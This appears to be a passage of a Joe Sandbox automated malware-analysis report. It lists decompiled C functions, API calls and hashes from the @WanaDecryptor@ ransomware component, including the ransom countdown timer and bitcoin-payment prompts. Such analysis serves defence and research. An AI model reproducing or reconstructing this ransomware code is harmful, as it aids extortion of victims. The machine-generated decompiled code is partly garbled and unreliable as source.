                                  										_push(_t130 + 0x24);
                                  										L00412D7C();
                                  										_push(0x4206e0);
                                  										_push(_t55);
                                  										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                  										_push(_t130 + 0x24);
                                  										L00412CCE();
                                  										 *(_t130 + 0x2fc) = 5;
                                  										L00412CC2();
                                  										_t86 =  *0x42179c; // 0x0
                                  										 *(_t130 + 0x24) = _t86;
                                  										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                  										_t132 = _t130 + 0xc;
                                  										asm("stosw");
                                  										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                  										_t64 = wcslen(_t132 + 0x24);
                                  										_t123 = _t132 + 0x28;
                                  										_t92 = _t64 << 1 >> 2;
                                  										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                  										_t134 = _t132 + 0x18;
                                  										_t68 = wcslen(_t134 + 0x28);
                                  										_t130 = _t134 + 8;
                                  										_t128 = _t128 + _t68 * 2;
                                  										 *(_t130 + 0x2fc) = 0xffffffff;
                                  										L00412CC2();
                                  										_t78 = _t78 + 1;
                                  										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                  										if(_t78 >= _t55) {
                                  											break;
                                  										}
                                  										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                  									}
                                  									_t122 =  *(_t130 + 0x14);
                                  								}
                                  								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                  								GlobalUnlock(_t122);
                                  								EmptyClipboard();
                                  								SetClipboardData(0xd, _t122);
                                  							} else {
                                  								GlobalFree(_t122);
                                  							}
                                  						}
                                  						_t51 = CloseClipboard();
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                  				return _t51;
                                  			}

                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 63%
                                  			E004076A0(void* __ecx) {
                                  				intOrPtr _t89;
                                  				char _t90;
                                  				intOrPtr _t91;
                                  				signed int _t94;
                                  				intOrPtr _t98;
                                  				signed int _t99;
                                  				intOrPtr _t125;
                                  				signed int _t133;
                                  				void* _t136;
                                  				intOrPtr _t139;
                                  				signed int _t143;
                                  				signed int _t147;
                                  				void* _t148;
                                  				intOrPtr _t161;
                                  				signed int _t192;
                                  				intOrPtr _t193;
                                  				signed int _t196;
                                  				signed int _t197;
                                  				signed int _t198;
                                  				intOrPtr _t200;
                                  				intOrPtr _t202;
                                  				void* _t204;
                                  				intOrPtr _t206;
                                  				void* _t207;
                                  				void* _t208;
                                  				void* _t209;
                                  				void* _t210;
                                  				void* _t211;
                                  				void* _t213;
                                  				long long _t225;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413EBB);
                                  				_t89 =  *[fs:0x0];
                                  				_push(_t89);
                                  				 *[fs:0x0] = _t206;
                                  				_t207 = _t206 - 0x8c;
                                  				_t196 = 0;
                                  				_t136 = __ecx;
                                  				 *((intOrPtr*)(_t207 + 0x14)) = 0;
                                  				 *((intOrPtr*)(_t207 + 0x18)) = 0;
                                  				 *(_t207 + 0x1c) = 0;
                                  				 *(_t207 + 0x20) = 0;
                                  				_t204 = 0;
                                  				L2:
                                  				__imp__time(_t196);
                                  				_t139 = M00421120; // 0x30303b30
                                  				_t161 = _t89;
                                  				_t90 = "00;00;00;00"; // 0x303b3030
                                  				 *((intOrPtr*)(_t207 + 0x40)) = _t139;
                                  				 *(_t207 + 0x3c) = _t90;
                                  				_t91 =  *0x421124; // 0x30303b
                                  				 *((intOrPtr*)(_t207 + 0x44)) = _t91;
                                  				_t208 = _t207 + 4;
                                  				 *(_t208 + 0x24) = _t196;
                                  				memset(_t208 + 0x44, 0, 0x16 << 2);
                                  				_t209 = _t208 + 0xc;
                                  				if(_t204 != 0) {
                                  					_t94 =  *(_t136 + 0x580);
                                  				} else {
                                  					_t94 =  *(_t136 + 0x57c);
                                  				}
                                  				_t98 =  *((intOrPtr*)(_t136 + 0x578));
                                  				_t143 = _t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4 + (_t94 + _t94 * 2 + (_t94 + _t94 * 2) * 4) * 4) * 8 << 7;
                                  				if(_t161 <= _t98) {
                                  					_t99 =  *(_t209 + 0x24);
                                  				} else {
                                  					_t133 = _t98 - _t161 + _t143;
                                  					_t196 = _t133;
                                  					if(_t196 <= 0) {
                                  						_t99 =  *(_t209 + 0x24);
                                  					} else {
                                  						asm("cdq");
                                  						_t99 = _t133 * 0x64 / _t143;
                                  					}
                                  					if(_t196 < 0) {
                                  						_t196 = 0;
                                  					}
                                  				}
                                  				if(_t204 != 0) {
                                  					 *(_t209 + 0x20) = _t99;
                                  				} else {
                                  					 *(_t209 + 0x14) = _t196;
                                  					 *(_t209 + 0x1c) = _t99;
                                  				}
                                  				 *(_t209 + 0x2e) = ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10) + ((0xc22e4507 * _t196 >> 0x20) + _t196 >> 0x10 >> 0x1f);
                                  				_t147 =  *(_t209 + 0x2e) & 0x0000ffff;
                                  				_t197 = _t196 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4 + ( ~((_t147 << 4) - _t147) +  ~((_t147 << 4) - _t147) * 4) * 8 << 7);
                                  				 *(_t209 + 0x30) = ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb) + ((0x91a2b3c5 * _t197 >> 0x20) + _t197 >> 0xb >> 0x1f);
                                  				_t192 =  *(_t209 + 0x30) & 0x0000ffff;
                                  				_t198 = _t197 + _t192 * 0xfffff1f0;
                                  				 *(_t209 + 0x32) = ((0x88888889 * _t198 >> 0x20) + _t198 >> 5) + ((0x88888889 * _t198 >> 0x20) + _t198 >> 5 >> 0x1f);
                                  				sprintf(_t209 + 0x48, "%02d;%02d;%02d;%02d", _t147, _t192,  *(_t209 + 0x32) & 0x0000ffff, _t198 +  ~((( *(_t209 + 0x32) & 0x0000ffff) << 4) - ( *(_t209 + 0x32) & 0x0000ffff)) * 4);
                                  				_t207 = _t209 + 0x18;
                                  				if(_t204 != 0) {
                                  					_t148 = _t136 + 0x444;
                                  					_push(_t207 + 0x38);
                                  				} else {
                                  					_push(_t207 + 0x38);
                                  					_t148 = _t136 + 0x3c8;
                                  				}
                                  				_t89 = E00405180(_t148);
                                  				_t204 = _t204 + 1;
                                  				if(_t204 < 2) {
                                  					_t196 = 0;
                                  					goto L2;
                                  				}
                                  				SendMessageA( *(_t136 + 0x140), 0x402,  *(_t207 + 0x1c), 0);
                                  				SendMessageA( *(_t136 + 0x1c4), 0x402,  *(_t207 + 0x20), 0);
                                  				L00412DA6();
                                  				 *(_t207 + 0xa4) = 0;
                                  				_t225 =  *((intOrPtr*)(_t136 + 0x584));
                                  				if( *((intOrPtr*)(_t207 + 0x14)) <= 0) {
                                  					_t225 = _t225 + st0;
                                  					 *(_t136 + 0x818) = 1;
                                  				}
                                  				_t124 =  *((intOrPtr*)(_t136 + 0x588));
                                  				if(_t124 != 0) {
                                  					 *((long long*)(_t207 + 0x14)) = _t225;
                                  					_t200 =  *((intOrPtr*)(_t207 + 0x18));
                                  					_t193 =  *((intOrPtr*)(_t207 + 0x14));
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_t124 = _t136 + 0x81c;
                                  					_push("%.1f BTC");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t210 = _t207 + 0x10;
                                  					_push(_t200);
                                  					_push(_t193);
                                  					_push("Send %.1f BTC to this address:");
                                  					_push(_t210 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t210 + 0x10;
                                  				} else {
                                  					L0041304A();
                                  					_t202 = _t124;
                                  					_push(_t202);
                                  					_push("$%d");
                                  					_push(_t136 + 0x81c);
                                  					L00412E00();
                                  					_t213 = _t207 + 0xc;
                                  					_push(_t202);
                                  					_push("Send $%d worth of bitcoin to this address:");
                                  					_push(_t213 + 0x10);
                                  					L00412E00();
                                  					_t211 = _t213 + 0xc;
                                  				}
                                  				_push( *((intOrPtr*)(_t211 + 0x10)));
                                  				_push(0x402);
                                  				L00412CE6();
                                  				L00412CE0();
                                  				_t125 =  *((intOrPtr*)(_t136 + 0x824));
                                  				 *((intOrPtr*)(_t136 + 0x824)) = 0x121284;
                                  				if(_t125 != 0x121284) {
                                  					E004079C0(_t136);
                                  					_t125 =  *((intOrPtr*)(_t211 + 0xac));
                                  					if(_t125 != 0) {
                                  						InvalidateRect( *(_t136 + 0x20), 0, 1);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						E00405920(_t136 + 0x3c8,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  						_push( *((intOrPtr*)(_t136 + 0x824)));
                                  						_t125 = E00405920(_t136 + 0x444,  *((intOrPtr*)(_t136 + 0x824)), 0xffffff);
                                  					}
                                  				}
                                  				 *((intOrPtr*)(_t211 + 0xa4)) = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t211 + 0x9c));
                                  				return _t125;
                                  			}

                                  APIs
                                  • time.MSVCRT ref: 004076DA
                                  • sprintf.MSVCRT ref: 0040780E
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
                                  • SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
                                  • #540.MFC42 ref: 00407876
                                  • _ftol.MSVCRT ref: 004078AA
                                  • #2818.MFC42(?,$%d,00000000), ref: 004078BE
                                  • #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
                                  • #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
                                  • #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
                                  • #3092.MFC42(00000402,?), ref: 0040791D
                                  • #6199.MFC42(00000402,?), ref: 00407924
                                  • InvalidateRect.USER32(?,00000000,00000001,00000402,?), ref: 0040795A
                                  • #800.MFC42 ref: 0040799F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2818$MessageSend$#3092#540#6199#800InvalidateRect_ftolsprintftime
                                  • String ID: $%d$%.1f BTC$%02d;%02d;%02d;%02d$00;00;00;00$Send $%d worth of bitcoin to this address:$Send %.1f BTC to this address:
                                  • API String ID: 993288296-3256873439
                                  • Opcode ID: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction ID: 9b53b323f570066dafa0cf34324f53a17123da88a1e7ff32529d6bfb7c89d06c
                                  • Opcode Fuzzy Hash: 4d580652efe8d7a149869b3900c519b1c6978745f6efd4f0e097fd633cdec313
                                  • Instruction Fuzzy Hash: 3281D4B1A043019BD720DF18C981FAB77E9EF88700F04893EF949DB395DA74A9058B96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				void* _t86;
                                  				intOrPtr* _t121;
                                  				intOrPtr* _t122;
                                  				intOrPtr* _t123;
                                  				intOrPtr* _t124;
                                  				intOrPtr* _t125;
                                  				intOrPtr* _t126;
                                  				intOrPtr* _t127;
                                  				intOrPtr _t132;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413C65);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t132;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t121 = __ecx + 0x890;
                                  				_v16 = _t121;
                                  				 *_t121 = 0x415c00;
                                  				_v4 = 0x1d;
                                  				L00412D52();
                                  				 *_t121 = 0x415bec;
                                  				_t122 = __ecx + 0x888;
                                  				_v16 = _t122;
                                  				 *_t122 = 0x415c00;
                                  				_v4 = 0x1e;
                                  				L00412D52();
                                  				 *_t122 = 0x415bec;
                                  				_t123 = __ecx + 0x880;
                                  				_v16 = _t123;
                                  				 *_t123 = 0x415c00;
                                  				_v4 = 0x1f;
                                  				L00412D52();
                                  				 *_t123 = 0x415bec;
                                  				_t124 = __ecx + 0x878;
                                  				_v16 = _t124;
                                  				 *_t124 = 0x415c00;
                                  				_v4 = 0x20;
                                  				L00412D52();
                                  				 *_t124 = 0x415bec;
                                  				_v4 = 0x18;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				E00403F20(__ecx + 0x870);
                                  				_v4 = 0x17;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				E00403F20(__ecx + 0x868);
                                  				_v4 = 0x16;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				E00403F20(__ecx + 0x860);
                                  				_v4 = 0x15;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				E00403F20(__ecx + 0x858);
                                  				_t125 = __ecx + 0x850;
                                  				_v16 = _t125;
                                  				 *_t125 = 0x415c00;
                                  				_v4 = 0x21;
                                  				L00412D52();
                                  				 *_t125 = 0x415bec;
                                  				_v4 = 0x13;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				E00403F20(__ecx + 0x848);
                                  				_v4 = 0x12;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				E00403F20(__ecx + 0x840);
                                  				_v4 = 0x11;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				E00403F20(__ecx + 0x838);
                                  				_t126 = __ecx + 0x830;
                                  				_v16 = _t126;
                                  				 *_t126 = 0x415c00;
                                  				_v4 = 0x22;
                                  				L00412D52();
                                  				 *_t126 = 0x415bec;
                                  				_v4 = 0xf;
                                  				L00412CC2();
                                  				_v4 = 0xe;
                                  				L00412CC2();
                                  				_v4 = 0xd;
                                  				L00412CC2();
                                  				_v4 = 0xc;
                                  				L00412CC2();
                                  				_v4 = 0xb;
                                  				L00412EF6();
                                  				_v4 = 0xa;
                                  				E004050A0(__ecx + 0x444);
                                  				_v4 = 9;
                                  				E004050A0(__ecx + 0x3c8);
                                  				_v4 = 8;
                                  				E00404170(__ecx + 0x360);
                                  				_v4 = 7;
                                  				E00404170(__ecx + 0x2f8);
                                  				_v4 = 6;
                                  				E00404170(__ecx + 0x290);
                                  				_v4 = 5;
                                  				E00404170(__ecx + 0x228);
                                  				_t127 = __ecx + 0x1a4;
                                  				_v16 = _t127;
                                  				 *_t127 = 0x4161a4;
                                  				_v4 = 0x23;
                                  				L00412F0E();
                                  				_v4 = 4;
                                  				L00412C9E();
                                  				_v4 = 3;
                                  				_t86 = E00405D90(__ecx + 0x120);
                                  				_v4 = 2;
                                  				L00412EF0();
                                  				_v4 = 1;
                                  				L00412EF0();
                                  				_v4 = 0;
                                  				L00412D4C();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t86;
                                  			}

















                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E004032C0(intOrPtr __ecx) {
                                  				intOrPtr _t16;
                                  				long _t17;
                                  				struct HFONT__* _t19;
                                  				long _t20;
                                  				long _t21;
                                  				long _t23;
                                  				int _t35;
                                  				int _t38;
                                  				int _t40;
                                  				int _t47;
                                  				intOrPtr _t48;
                                  
                                  				_t48 = __ecx;
                                  				L00412CB0();
                                  				_t16 =  *0x42189c; // 0x0
                                  				_t17 =  *(_t16 + 0x824);
                                  				 *(__ecx + 0xe8) = _t17;
                                  				_push(CreateSolidBrush(_t17));
                                  				L00412D5E();
                                  				_t47 = __ecx + 0xec;
                                  				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
                                  				_push(_t19);
                                  				L00412D5E();
                                  				_push(0x408);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t35 =  *(_t47 + 4);
                                  				} else {
                                  					_t35 = 0;
                                  				}
                                  				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
                                  				_push(0x409);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t38 =  *(_t47 + 4);
                                  				} else {
                                  					_t38 = 0;
                                  				}
                                  				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
                                  				_push(2);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t40 =  *(_t47 + 4);
                                  				} else {
                                  					_t40 = 0;
                                  				}
                                  				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
                                  				_push(0x40e);
                                  				L00412CE6();
                                  				if(_t47 != 0) {
                                  					_t47 =  *(_t47 + 4);
                                  				}
                                  				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
                                  				E00403CB0(_t48);
                                  				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
                                  				_push(0xffffffff);
                                  				_push(0xffffffff);
                                  				_push(0);
                                  				_push("Path");
                                  				_push(0);
                                  				L00412D58();
                                  				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
                                  				 *0x4217bc = _t48;
                                  				return 1;
                                  			}















                                  APIs
                                  • #4710.MFC42 ref: 004032C5
                                  • CreateSolidBrush.GDI32(?), ref: 004032DC
                                  • #1641.MFC42(00000000), ref: 004032E9
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
                                  				char _v4;
                                  				char _v12;
                                  				char _v24;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v40;
                                  				void* _v280;
                                  				char _v284;
                                  				char _v288;
                                  				char _v292;
                                  				void* _v296;
                                  				char _v300;
                                  				intOrPtr _v304;
                                  				char _v308;
                                  				void* _v312;
                                  				void* _v316;
                                  				char** _t26;
                                  				long _t30;
                                  				void* _t31;
                                  				char** _t32;
                                  				void* _t56;
                                  				intOrPtr _t58;
                                  				void* _t60;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E61);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t58;
                                  				_t56 = __ecx;
                                  				L00412DA6();
                                  				_t26 =  &_v284;
                                  				_push(_t26);
                                  				_v4 = 0;
                                  				L00412DD6();
                                  				_push("msg\\");
                                  				L00412CAA();
                                  				_push("m_%s.wnry");
                                  				_push(_t26);
                                  				_push( &_v288);
                                  				_v12 = 1;
                                  				L00412CCE();
                                  				sprintf( &_v292,  *_t26, _v304);
                                  				_t60 = _t58 - 0x110 + 0xc;
                                  				L00412CC2();
                                  				_v24 = 0;
                                  				L00412CC2();
                                  				_t30 = GetFileAttributesA( &_v292);
                                  				if(_t30 == 0xffffffff) {
                                  					_push("msg\\");
                                  					L00412CAA();
                                  					_push("m_%s.wnry");
                                  					_push(_t30);
                                  					_t32 =  &_v300;
                                  					_v28 = 2;
                                  					_push(_t32);
                                  					L00412CCE();
                                  					sprintf( &_v308,  *_t32, "English");
                                  					_t60 = _t60 + 0xc;
                                  					L00412CC2();
                                  					_v40 = 0;
                                  					L00412CC2();
                                  				}
                                  				_t31 = E00406CF0(_t56,  &_v292);
                                  				_v28 = 0xffffffff;
                                  				L00412CC2();
                                  				 *[fs:0x0] = _v36;
                                  				return _t31;
                                  			}



























                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
